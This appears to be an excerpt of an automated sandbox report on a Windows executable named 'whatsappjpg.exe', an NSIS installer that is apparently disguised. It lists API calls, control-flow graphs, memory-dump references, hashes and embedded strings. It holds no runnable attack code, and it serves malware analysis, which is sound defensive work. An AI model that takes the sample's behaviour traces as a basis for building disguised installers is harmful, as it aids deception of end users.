                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp$C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll$C:\Users\user\Uploadable\normallnnens$Call
                                                      • API String ID: 1941528284-2382031231
                                                      • Opcode ID: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
                                                      • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                      • Opcode Fuzzy Hash: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
                                                      • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                      • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                      • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                      • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406236
                                                      • FindClose.KERNEL32(00000000), ref: 00406242
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: WB
                                                      • API String ID: 2295610775-2854515933
                                                      • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                      • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                      • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                      • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                      • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                      • String ID:
                                                      • API String ID: 310444273-0
                                                      • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                      • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                                                      • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                      • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 167 403c55-403c67 168 403da8-403db7 167->168 169 403c6d-403c73 167->169 171 403e06-403e1b 168->171 172 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 168->172 169->168 170 403c79-403c82 169->170 173 403c84-403c91 SetWindowPos 170->173 174 403c97-403c9a 170->174 176 403e5b-403e60 call 404179 171->176 177 403e1d-403e20 171->177 172->171 173->174 179 403cb4-403cba 174->179 180 403c9c-403cae ShowWindow 174->180 186 403e65-403e80 176->186 182 403e22-403e2d call 401389 177->182 183 403e53-403e55 177->183 187 403cd6-403cd9 179->187 188 403cbc-403cd1 DestroyWindow 179->188 180->179 182->183 198 403e2f-403e4e SendMessageW 182->198 183->176 185 4040fa 183->185 193 4040fc-404103 185->193 191 403e82-403e84 call 40140b 186->191 192 403e89-403e8f 186->192 196 403cdb-403ce7 SetWindowLongW 187->196 197 403cec-403cf2 187->197 194 4040d7-4040dd 188->194 191->192 201 403e95-403ea0 192->201 202 4040b8-4040d1 DestroyWindow EndDialog 192->202 194->185 199 4040df-4040e5 194->199 196->193 203 403d95-403da3 call 404194 197->203 204 403cf8-403d09 GetDlgItem 197->204 198->193 199->185 208 4040e7-4040f0 ShowWindow 199->208 201->202 209 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 201->209 202->194 203->193 205 403d28-403d2b 204->205 206 403d0b-403d22 SendMessageW IsWindowEnabled 204->206 210 403d30-403d33 205->210 211 403d2d-403d2e 205->211 206->185 206->205 208->185 237 403ef5-403efa 209->237 238 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 209->238 215 403d41-403d46 210->215 216 403d35-403d3b 210->216 214 403d5e-403d63 call 404106 211->214 214->203 218 403d7c-403d8f SendMessageW 215->218 220 403d48-403d4e 215->220 216->218 219 403d3d-403d3f 216->219 218->203 219->214 223 403d50-403d56 call 40140b 220->223 224 403d65-403d6e call 40140b 220->224 235 403d5c 223->235 224->203 233 403d70-403d7a 224->233 233->235 235->214 237->238 241 403f3b-403f3c 238->241 242 403f3e 238->242 243 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 241->243 242->243 244 403f70-403f81 SendMessageW 243->244 245 403f83 243->245 246 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 244->246 245->246 246->186 255 403fcd-403fcf 246->255 255->186 256 403fd5-403fd9 255->256 257 403ff8-40400c DestroyWindow 256->257 258 403fdb-403fe1 256->258 257->194 260 404012-40403f CreateDialogParamW 257->260 258->185 259 403fe7-403fed 258->259 259->186 261 403ff3 259->261 260->194 262 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 260->262 261->185 262->185 267 40409e-4040b1 ShowWindow call 404179 262->267 269 4040b6 267->269 269->194
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                      • ShowWindow.USER32(?), ref: 00403CAE
                                                      • DestroyWindow.USER32 ref: 00403CC2
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                      • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                      • GetDlgItem.USER32(?,?), ref: 00403DC8
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                      • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                                                      • EnableWindow.USER32(?,?), ref: 00403F31
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
                                                      • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                      • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                      • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                      • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: kS
                                                      • API String ID: 3282139019-2421827262
                                                      • Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                                                      • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                      • Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                                                      • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 270 4038b2-4038ca call 406252 273 4038cc-4038dc call 405e2f 270->273 274 4038de-403915 call 405db5 270->274 281 403938-403961 call 403b88 call 405a3b 273->281 279 403917-403928 call 405db5 274->279 280 40392d-403933 lstrcatW 274->280 279->280 280->281 288 4039f3-4039fb call 405a3b 281->288 289 403967-40396c 281->289 295 403a09-403a2e LoadImageW 288->295 296 4039fd-403a04 call 405f0a 288->296 289->288 290 403972-40398c call 405db5 289->290 294 403991-40399a 290->294 294->288 297 40399c-4039a0 294->297 299 403a30-403a60 RegisterClassW 295->299 300 403aaf-403ab7 call 40140b 295->300 296->295 302 4039b2-4039be lstrlenW 297->302 303 4039a2-4039af call 405960 297->303 304 403a66-403aaa SystemParametersInfoW CreateWindowExW 299->304 305 403b7e 299->305 312 403ac1-403acc call 403b88 300->312 313 403ab9-403abc 300->313 309 4039c0-4039ce lstrcmpiW 302->309 310 4039e6-4039ee call 405933 call 405ee8 302->310 303->302 304->300 307 403b80-403b87 305->307 309->310 311 4039d0-4039da GetFileAttributesW 309->311 310->288 316 4039e0-4039e1 call 40597f 311->316 317 4039dc-4039de 311->317 323 403ad2-403aef ShowWindow LoadLibraryW 312->323 324 403b55-403b56 call 405265 312->324 313->307 316->310 317->310 317->316 326 403af1-403af6 LoadLibraryW 323->326 327 403af8-403b0a GetClassInfoW 323->327 328 403b5b-403b5d 324->328 326->327 329 403b22-403b45 DialogBoxParamW call 40140b 327->329 330 403b0c-403b1c GetClassInfoW RegisterClassW 327->330 331 403b77-403b79 call 40140b 328->331 332 403b5f-403b65 328->332 336 403b4a-403b53 call 403802 329->336 330->329 331->305 332->313 334 403b6b-403b72 call 40140b 332->334 334->313 336->307
                                                      APIs
                                                        • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                        • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                        • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                      • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76F93420,00000000,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00403933
                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                      • GetFileAttributesW.KERNEL32(Call), ref: 004039D1
                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\Uploadable\normallnnens), ref: 00403A1A
                                                        • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                      • RegisterClassW.USER32(00428180), ref: 00403A57
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                      • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                      • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                      • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Uploadable\normallnnens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                      • API String ID: 914957316-1820613078
                                                      • Opcode ID: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
                                                      • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                      • Opcode Fuzzy Hash: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
                                                      • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 341 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 344 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 341->344 345 402e0a-402e0f 341->345 353 402f32-402f40 call 402d18 344->353 354 402e48-402e5f 344->354 346 403059-40305d 345->346 360 403011-403016 353->360 361 402f46-402f49 353->361 355 402e61 354->355 356 402e63-402e70 call 4032f7 354->356 355->356 365 402e76-402e7c 356->365 366 402fcd-402fd5 call 402d18 356->366 360->346 363 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 361->363 364 402f4b-402f63 call 40330d call 4032f7 361->364 391 402fc3-402fc8 363->391 392 402fd7-403007 call 40330d call 403060 363->392 364->360 389 402f69-402f6f 364->389 369 402efc-402f00 365->369 370 402e7e-402e96 call 405b0f 365->370 366->360 373 402f02-402f08 call 402d18 369->373 374 402f09-402f0f 369->374 370->374 388 402e98-402e9f 370->388 373->374 380 402f11-402f1f call 406300 374->380 381 402f22-402f2c 374->381 380->381 381->353 381->354 388->374 393 402ea1-402ea8 388->393 389->360 389->363 391->346 401 40300c-40300f 392->401 393->374 395 402eaa-402eb1 393->395 395->374 397 402eb3-402eba 395->397 397->374 399 402ebc-402edc 397->399 399->360 400 402ee2-402ee6 399->400 402 402ee8-402eec 400->402 403 402eee-402ef6 400->403 401->360 404 403018-403029 401->404 402->353 402->403 403->374 405 402ef8-402efa 403->405 406 403031-403036 404->406 407 40302b 404->407 405->374 408 403037-40303d 406->408 407->406 408->408 409 40303f-403057 call 405b0f 408->409 409->346
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DCE
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\whatsappjpg.exe,00000400), ref: 00402DEA
                                                        • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405B58
                                                        • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\whatsappjpg.exe,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00402E33
                                                      • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\whatsappjpg.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-3136287766
                                                      • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                      • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                      • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                      • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                                                      APIs
                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225
                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
                                                      • GlobalFree.KERNEL32(00000000), ref: 10001CAF
                                                      • GlobalFree.KERNEL32(?), ref: 10001DA9
                                                      • GlobalFree.KERNEL32(?), ref: 10001DAE
                                                      • GlobalFree.KERNEL32(?), ref: 10001DB3
                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F57
                                                      • lstrcpyW.KERNEL32(?,?), ref: 100020BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                      • String ID:
                                                      • API String ID: 4227406936-0
                                                      • Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                      • Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
                                                      • Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                      • Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 803 405192-4051a7 804 4051ad-4051be 803->804 805 40525e-405262 803->805 806 4051c0-4051c4 call 405f0a 804->806 807 4051c9-4051d5 lstrlenW 804->807 806->807 809 4051f2-4051f6 807->809 810 4051d7-4051e7 lstrlenW 807->810 812 405205-405209 809->812 813 4051f8-4051ff SetWindowTextW 809->813 810->805 811 4051e9-4051ed lstrcatW 810->811 811->809 814 40520b-40524d SendMessageW * 3 812->814 815 40524f-405251 812->815 813->812 814->815 815->805 816 405253-405256 815->816 816->805
                                                      APIs
                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                      • lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
